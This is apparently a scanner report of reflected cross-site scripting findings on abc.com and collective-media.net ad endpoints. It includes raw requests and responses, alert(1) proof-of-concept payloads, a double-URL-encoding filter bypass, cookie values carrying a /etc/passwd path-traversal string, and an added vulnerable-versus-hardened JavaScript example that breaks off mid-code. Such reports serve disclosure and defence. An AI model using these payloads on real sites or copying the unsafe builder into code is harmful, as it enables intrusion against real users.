Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.abc.com
Path:   /service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript inline comment. The payload aa5fa%252a%252falert%25281%2529%252f%252f0f95b5b210d was submitted in the REST URL parameter 5. This input was echoed as aa5fa*/alert(1)//0f95b5b210d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.jsaa5fa%252a%252falert%25281%2529%252f%252f0f95b5b210d?cb=v9.00 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 145111
Content-Type: text/javascript
Last-Modified: Sat, 17 Sep 2011 01:02:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed10
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 02:02:31 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=272
Date: Sat, 17 Sep 2011 01:02:32 GMT
Connection: close


/**
* @filepath: ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleteraa5fa*/alert(1)//0f95b5b210d
* @created: Fri, 16 Sep 11 18:02:32 -0700
*/


/**
* @filepath: /utils/jquery.ifixpng2.js
* @created: Fri, 16 Sep 11 18:02:31 -0700
*/
;(function($){$.ifixpng=function(customPixel){$.ifixpng.pixel=cu
...[SNIP]...

4.2. http://a.abc.com/service/sfp/omnitureconfig/ [pageURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.abc.com
Path:   /service/sfp/omnitureconfig/

Issue detail

The value of the pageURL request parameter is copied into the XML document as plain text between tags. The payload f23fc<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8491a57dfb1 was submitted in the pageURL parameter. This input was echoed as f23fc<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8491a57dfb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /service/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angelsf23fc<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8491a57dfb1 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1037
Content-Type: text/xml
Last-Modified: Sat, 17 Sep 2011 01:03:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed04
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 02:03:32 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=279
Date: Sat, 17 Sep 2011 01:03:31 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<omnitureProfile account="wdgabccom" visitorNamespace="abc" trackingServer="w88.go.com" trackingServerSecure="sw88.go.com" dc="112">

<param id="prop13" value="
...[SNIP]...
<param id="pageURL" value="http://beta.abc.go.com/shows/charlies-angelsf23fc<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8491a57dfb1" enabled="true" />
...[SNIP]...

4.3. http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f413'-alert(1)-'1042a85aca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_bostonherald2f413'-alert(1)-'1042a85aca3/;sz=728x90;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 458
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:48:57 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:48:57 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.rev_bostonherald2f413'-alert(1)-'1042a85aca3/;sz=728x90;net=cm;ord=%23PCACHEBUSTER;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.4. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9849'-alert(1)-'3c99bede0bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_bostonherald/;sz=728x90;ord=%23PCACHEBUSTER?&b9849'-alert(1)-'3c99bede0bf=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 462
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:48:55 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:48:55 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.rev_bostonherald/;sz=728x90;net=cm;ord=%23PCACHEBUSTER?&b9849'-alert(1)-'3c99bede0bf=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.5. http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3030f'-alert(1)-'78b5323d0b7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_bostonherald/;sz=728x90;ord=%23PCACHEBUSTER?3030f'-alert(1)-'78b5323d0b7 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 459
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:48:47 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d1cb6ad6c2dd07ed8; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:48:47 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.rev_bostonherald/;sz=728x90;net=cm;ord=%23PCACHEBUSTER?3030f'-alert(1)-'78b5323d0b7;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.6. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86817'-alert(1)-'7a10fc56168 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.revinet.bostonherald86817'-alert(1)-'7a10fc56168/audience;sz=160x600;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:10 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:10 GMT
Content-Length: 482

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald86817'-alert(1)-'7a10fc56168/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.7. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3b3a'-alert(1)-'ebe641e9daf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.revinet.bostonherald/audiencea3b3a'-alert(1)-'ebe641e9daf;sz=160x600;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:16 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:16 GMT
Content-Length: 482

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audiencea3b3a'-alert(1)-'ebe641e9daf;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.8. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 787bc'-alert(1)-'bb972807ee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.revinet.bostonherald/audience;sz=160x600;ord=%23PCACHEBUSTER?&787bc'-alert(1)-'bb972807ee4=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:02 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:02 GMT
Content-Length: 485

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?&787bc'-alert(1)-'bb972807ee4=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.9. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48284'-alert(1)-'1a524591d7c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.revinet.bostonherald/audience;sz=160x600;ord=%23PCACHEBUSTER?48284'-alert(1)-'1a524591d7c HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:00 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc7a1d176d75a886b936744456; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:00 GMT
Content-Length: 482

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?48284'-alert(1)-'1a524591d7c;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.10. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.bosherald/be_news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ae82'-alert(1)-'477998e8ab0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bosherald3ae82'-alert(1)-'477998e8ab0/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:46 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:46 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald3ae82'-alert(1)-'477998e8ab0/be_news;sz=300x250;net=q1;ord=2118037356?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
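The block below is an added example, not code from the XSS.CX report or from the collective-media.net ad server. It models the pattern shared by findings 4.10 to 4.21 (a path segment or the sz value concatenated into a single-quoted JavaScript string inside document.write), puts a hardened builder beside it, and adds a scanner-style check that decides whether a probe of the report's shape x'-alert(1)-'y escaped the string literal. The function names, the allow-list patterns and the probe marker are assumptions made for the demo; the URL layout is copied from the responses quoted above.

```javascript
// Added example, not code from the XSS.CX report or from the collective-media.net
// ad server. Function names, allow-list patterns and the probe marker are assumed.

// Vulnerable pattern: request values concatenated straight into a single-quoted
// JavaScript string literal, as in the responses quoted in findings 4.10 to 4.21.
function buildAdTagUnsafe(network, placement, sz, ord) {
  return "var cmifr='';\n" +
    "document.write('<scr'+'ipt src=\"http://a.collective-media.net/cmadj/" +
    network + "/" + placement + ";sz=" + sz + ";net=q1;ord=" + ord +
    "?;'+cmifr+'ord1=1\"></scr'+'ipt>');";
}

// Hardened pattern: allow-list every component, then emit the URL as a
// JSON.stringify'd literal so no value can terminate the string. The allow-lists
// also exclude " < > &, which matters because the URL ends up inside an HTML
// src attribute once document.write runs.
const SEGMENT_RE = /^[A-Za-z0-9._-]{1,64}$/; // assumed policy for network/placement
const SIZE_RE = /^\d{1,4}x\d{1,4}$/;         // 300x250, 728x90, ...
const ORD_RE = /^\d{1,20}$/;                 // cache-buster, digits only

function buildAdTagSafe(network, placement, sz, ord) {
  if (!SEGMENT_RE.test(network) || !SEGMENT_RE.test(placement)) throw new Error('bad path segment');
  if (!SIZE_RE.test(sz)) throw new Error('bad sz');
  if (!ORD_RE.test(ord)) throw new Error('bad ord');
  const url = 'http://a.collective-media.net/cmadj/' + network + '/' + placement +
    ';sz=' + sz + ';net=q1;ord=' + ord + '?;';
  return "var cmifr='';\n" +
    "document.write('<scr'+'ipt src=\"' + " + JSON.stringify(url) +
    " + cmifr + 'ord1=1\"></scr'+'ipt>');";
}

// URL-encoding is not a fix for this context: encodeURIComponent leaves
// ' ( ) and - untouched, so the report's payload shape passes through unchanged.
function encodeUriComponentLeavesPayloadIntact() {
  const payload = "x'-alert(1)-'y";
  return encodeURIComponent(payload) === payload;
}

// Minimal JS string-state tracker: returns 'single', 'double' or 'code' for the
// context at body[index]. It honours backslash escapes but deliberately ignores
// comments, template and regex literals; that is enough for the ad-tag bodies
// quoted in the report, not for arbitrary JavaScript.
function jsContextAt(body, index) {
  let quote = null;
  for (let i = 0; i < index; i++) {
    const c = body[i];
    if (quote) {
      if (c === '\\') i++;           // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === "'" || c === '"') {
      quote = c;
    }
  }
  return quote === "'" ? 'single' : quote === '"' ? 'double' : 'code';
}

// Scanner-style check using the report's probe shape. A break-out is confirmed
// when the probe prefix lands inside a single-quoted literal while alert(1)
// lands in code. A prefix that is already in 'code' would correspond to the
// unquoted expression context described in finding 4.23.
function probeBreaksOut(buildFn, field) {
  const payload = "x1'-alert(1)-'y2";
  const args = { network: 'q1.bosherald', placement: 'be_news', sz: '300x250', ord: '2118037356' };
  args[field || 'placement'] = payload;
  let body;
  try {
    body = buildFn(args.network, args.placement, args.sz, args.ord);
  } catch (e) {
    return { rejected: true, reflected: false, breakout: false };
  }
  const at = body.indexOf(payload);
  if (at < 0) return { rejected: false, reflected: false, breakout: false };
  const prefixCtx = jsContextAt(body, at);
  const alertCtx = jsContextAt(body, body.indexOf('alert(1)', at));
  return { rejected: false, reflected: true, prefixCtx, alertCtx,
           breakout: prefixCtx === 'single' && alertCtx === 'code' };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe placement:', probeBreaksOut(buildAdTagUnsafe, 'placement'));
  console.log('unsafe sz:       ', probeBreaksOut(buildAdTagUnsafe, 'sz'));
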